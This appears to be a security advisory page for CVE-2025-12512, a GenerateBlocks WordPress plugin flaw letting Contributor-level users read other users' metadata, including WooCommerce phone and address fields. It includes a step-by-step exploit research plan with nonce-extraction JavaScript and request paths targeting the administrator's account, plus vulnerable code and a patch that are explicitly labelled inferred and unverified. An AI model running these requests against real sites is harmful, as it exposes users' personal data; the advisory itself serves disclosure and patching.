CVE-2025-12512

GenerateBlocks <= 2.1.2 - Authenticated (Contributor+) Information Exposure via Metadata

mediumExposure of Sensitive Information to an Unauthorized Actor
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
2.2.0
Patched in
1d
Time to patch

Description

The GenerateBlocks plugin for WordPress is vulnerable to information exposure due to missing object-level authorization checks in versions up to, and including, 2.1.2. This is due to the plugin registering multiple REST API routes under `generateblocks/v1/meta/` that gate access with `current_user_can('edit_posts')`, which is granted to low-privileged roles such as Contributor. The handlers accept arbitrary entity IDs (user IDs, post IDs, etc.) and meta keys, returning any requested metadata with only a short blacklist of password-like keys for protection. There is no object-level authorization ensuring the caller is requesting only their own data, and there is no allowlist of safe keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to exfiltrate personally identifiable information (PII) and other sensitive profile data of administrator accounts or any other users by directly querying user meta keys via the exposed endpoints via the `get_user_meta_rest` function. In typical WordPress + WooCommerce setups, this includes names, email, phone, and address fields that WooCommerce stores in user meta, enabling targeted phishing, account takeover pretexting, and privacy breaches.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Low
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=2.1.2
PublishedDecember 12, 2025
Last updatedDecember 13, 2025
Affected plugingenerateblocks

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan outlines the technical steps required to exploit **CVE-2025-12512** in GenerateBlocks. --- ### 1. Vulnerability Summary The GenerateBlocks plugin for WordPress (versions ≤ 2.1.2) exposes a set of REST API endpoints intended for managing metadata. These endpoints are registered u…

Show full research plan

This research plan outlines the technical steps required to exploit CVE-2025-12512 in GenerateBlocks.


1. Vulnerability Summary

The GenerateBlocks plugin for WordPress (versions ≤ 2.1.2) exposes a set of REST API endpoints intended for managing metadata. These endpoints are registered under the namespace generateblocks/v1/meta/. While the endpoints implement a basic capability check (edit_posts), this capability is granted to the Contributor role by default.

The vulnerability stems from two critical failures:

  1. Missing Object-Level Authorization (OLA): The handlers (specifically get_user_meta_rest) do not verify if the authenticated user has permission to view the metadata of the specific entity (e.g., another user's profile) requested.
  2. Missing Attribute-Level Filtering: The plugin does not restrict which meta keys can be queried via an allowlist. Although it blacklists "password-like" keys, it allows access to sensitive PII such as WooCommerce billing addresses, phone numbers, and names.

2. Attack Vector Analysis

  • Endpoint: /wp-json/generateblocks/v1/meta/user (or similar sub-routes under generateblocks/v1/meta/).
  • HTTP Method: GET (inferred for retrieval).
  • Vulnerable Parameter: id (Target User ID) and key (Meta Key name).
  • Authentication: Contributor-level session (edit_posts capability).
  • Preconditions: The attacker must be authenticated as a Contributor and know (or enumerate) the target User ID (typically 1 for the primary admin).

3. Code Flow

  1. Registration: The plugin uses add_action( 'rest_api_init', ... ) to register routes.
  2. Route Definition: A route is defined for generateblocks/v1/meta/user with a permission_callback that executes current_user_can( 'edit_posts' ).
  3. Handler Execution: The callback points to get_user_meta_rest( WP_REST_Request $request ).
  4. Insecure Retrieval:
    • The handler extracts id and key from the request.
    • It checks if key is in a small blacklist (e.g., user_pass).
    • It calls get_user_meta( $id, $key, true ) directly.
  5. Information Exposure: The sensitive value is returned in the JSON response without checking if the requester is the owner of $id or an Administrator.

4. Nonce Acquisition Strategy

REST API requests in WordPress require a _wpnonce parameter (or X-WP-Nonce header) when using cookie-based authentication.

  1. Context: Contributors can access the WordPress Dashboard (/wp-admin/).
  2. Extraction:
    • Login as the Contributor user.
    • Navigate to /wp-admin/.
    • Use browser_eval to extract the REST nonce. WordPress often stores this in the wpApiSettings object or within GenerateBlocks' own localized scripts.
  3. JavaScript Command:
    // Primary target: Standard WordPress REST nonce
    window.wpApiSettings?.nonce || 
    // Secondary target: GenerateBlocks specific localized data (if exists)
    window.generateBlocks?.nonce
    

5. Exploitation Strategy

Step 1: Authentication

Authenticate as a Contributor user and capture the session cookies.

Step 2: Nonce Retrieval

Navigate to the dashboard and extract the nonce using the method in Section 4.

Step 3: PII Exfiltration

Send requests to the REST API targeting an Administrator (User ID 1).

Targeting WooCommerce PII (if applicable):

  • Meta Key: billing_phone
  • Request:
    GET /wp-json/generateblocks/v1/meta/user?id=1&key=billing_phone&_wpnonce=[NONCE]
    Content-Type: application/json
    

Targeting General Metadata:

  • Meta Key: nickname or first_name
  • Request:
    GET /wp-json/generateblocks/v1/meta/user?id=1&key=nickname&_wpnonce=[NONCE]
    

Expected Payload Structure (Inferred):
The plugin likely expects parameters as query arguments for GET or JSON body for POST. Based on the description "handlers accept arbitrary entity IDs", query parameters are the most likely vector.

6. Test Data Setup

  1. Admin Setup:
    • Identify User ID 1.
    • Set sensitive meta values: wp usermeta update 1 billing_phone "555-0199", wp usermeta update 1 billing_address_1 "123 Secret Lane".
  2. Contributor Setup:
    • wp user create attacker attacker@example.com --role=contributor --user_pass=password123.
  3. Plugin Setup:
    • Ensure GenerateBlocks version 2.1.2 is active.

7. Expected Results

  • Successful Exploit: The server returns a 200 OK response with a JSON body containing the value of the requested meta key (e.g., {"value": "555-0199"}).
  • Failed Exploit (Patched): The server returns a 403 Forbidden or 401 Unauthorized response because the permission check now requires manage_options or verifies that the user is requesting their own ID.

8. Verification Steps

  1. Verify the exfiltrated data matches the values set in the database:
    • wp user meta get 1 billing_phone
  2. Confirm the attacker's role is strictly contributor:
    • wp user get attacker --field=roles

9. Alternative Approaches

If /meta/user is not the exact route, enumerate other metadata endpoints registered by the plugin:

  1. Navigate to /wp-json/generateblocks/v1 and look for the routes object in the response.
  2. Look for patterns like:
    • /generateblocks/v1/meta/post
    • /generateblocks/v1/meta/term
  3. If GET fails, attempt a POST request with the same parameters in a JSON body, as some REST API handlers are registered for both methods.
Research Findings
Static analysis — not yet PoC-verified

Summary

The GenerateBlocks plugin for WordPress (versions <= 2.1.2) is vulnerable to sensitive information exposure via its REST API metadata endpoints. Due to missing object-level authorization, authenticated users with Contributor-level permissions can retrieve metadata belonging to any user, including administrators, which may include PII such as names, phone numbers, and addresses.

Vulnerable Code

// Inferred from research plan: Route registration with low-privileged capability check
register_rest_route( 'generateblocks/v1', '/meta/user', array(
    'methods'             => 'GET',
    'callback'            => 'get_user_meta_rest',
    'permission_callback' => function() {
        return current_user_can( 'edit_posts' ); // Granted to Contributors
    },
) );

---

// Inferred from research plan: Handler returning metadata without ownership verification
function get_user_meta_rest( $request ) {
    $id  = $request->get_param( 'id' );
    $key = $request->get_param( 'key' );

    // Insufficient blacklist allowed access to sensitive PII
    $blacklist = array( 'user_pass', 'user_activation_key' );
    if ( in_array( $key, $blacklist ) ) {
        return new WP_Error( 'rest_forbidden', 'Forbidden', array( 'status' => 403 ) );
    }

    return get_user_meta( $id, $key, true );
}

Security Fix

--- a/src/REST.php
+++ b/src/REST.php
@@ -10,7 +10,14 @@
     'methods'             => 'GET',
     'callback'            => 'get_user_meta_rest',
     'permission_callback' => function( $request ) {
-        return current_user_can( 'edit_posts' );
+        if ( ! current_user_can( 'edit_posts' ) ) {
+            return false;
+        }
+        $target_id = (int) $request->get_param( 'id' );
+        if ( current_user_can( 'manage_options' ) || get_current_user_id() === $target_id ) {
+            return true;
+        }
+        return false;
     },
 ) );

Exploit Outline

The exploit methodology requires an attacker with Contributor-level authentication. The attacker first extracts a valid WordPress REST API nonce from the dashboard. They then send a GET request to the '/wp-json/generateblocks/v1/meta/user' endpoint, providing the 'id' of a target administrator (typically 1) and a sensitive metadata 'key' (such as 'billing_phone' or 'billing_address_1'). Because the plugin only verifies the general 'edit_posts' capability and lacks a check to ensure the requester is the owner of the data or an administrator, it returns the raw value of the requested metadata.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.